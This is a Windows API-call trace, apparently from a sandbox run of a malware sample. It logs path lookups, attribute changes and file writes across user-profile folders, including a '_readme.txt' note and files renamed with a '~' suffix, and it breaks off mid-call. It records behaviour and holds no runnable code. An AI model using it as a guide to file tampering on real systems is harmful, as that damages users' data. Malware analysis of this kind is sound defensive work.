GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.026] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.026] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.027] CoTaskMemFree (pv=0x508980) [0157.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.028] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0157.028] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Sun\\Java\\Java Update\\_readme.txt", lpFilePart=0x0) returned 0x33 [0157.036] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\_readme.txt", dwFileAttributes=0x80) returned 1 [0157.038] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.038] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.038] CoTaskMemFree (pv=0x508980) [0157.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.040] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.040] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.040] CoTaskMemFree (pv=0x508980) [0157.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.041] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.041] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.042] CoTaskMemFree (pv=0x508980) [0157.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.042] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.042] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.043] CoTaskMemFree (pv=0x508980) [0157.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.046] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0157.047] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0157.176] WriteFile (in: hFile=0x1c8, lpBuffer=0x227cf8c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x227cf8c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0157.176] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 1 [0157.184] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.184] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.185] CoTaskMemFree (pv=0x508980) [0157.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.186] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.186] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.186] CoTaskMemFree (pv=0x508980) [0157.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.188] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.188] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.188] CoTaskMemFree (pv=0x508980) [0157.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.192] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.192] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.192] CoTaskMemFree (pv=0x508980) [0157.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.195] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.195] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.195] CoTaskMemFree (pv=0x508980) [0157.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.213] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.214] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x3f [0157.215] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.215] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.215] CoTaskMemFree (pv=0x508980) [0157.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.216] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x3f [0157.216] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x3f [0157.218] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x3f [0157.219] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x3f [0157.220] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.221] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.221] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.239] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.240] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 0x5a [0157.240] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 0x5a [0157.242] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.242] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 0x5a [0157.243] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 0x5a [0157.245] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.245] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 0x53 [0157.246] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 0x53 [0157.247] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x3f [0157.248] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x3f [0157.249] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.249] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.250] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x40 [0157.257] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.257] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x56 [0157.258] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.258] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.258] CoTaskMemFree (pv=0x508980) [0157.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.259] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x56 [0157.260] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x56 [0157.261] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x56 [0157.262] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x56 [0157.263] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.263] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.264] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.267] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x56 [0157.267] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x56 [0157.268] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.269] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.270] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.273] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.274] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.275] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x61 [0157.276] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.276] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.276] CoTaskMemFree (pv=0x508980) [0157.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.276] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebf0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.277] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebf0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x61 [0157.278] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebf0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x61 [0157.279] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.280] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x61 [0157.281] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x61 [0157.282] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.283] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.284] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.284] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.285] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.289] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.289] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.290] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 0x7c [0157.291] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 0x7c [0157.292] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebc0, 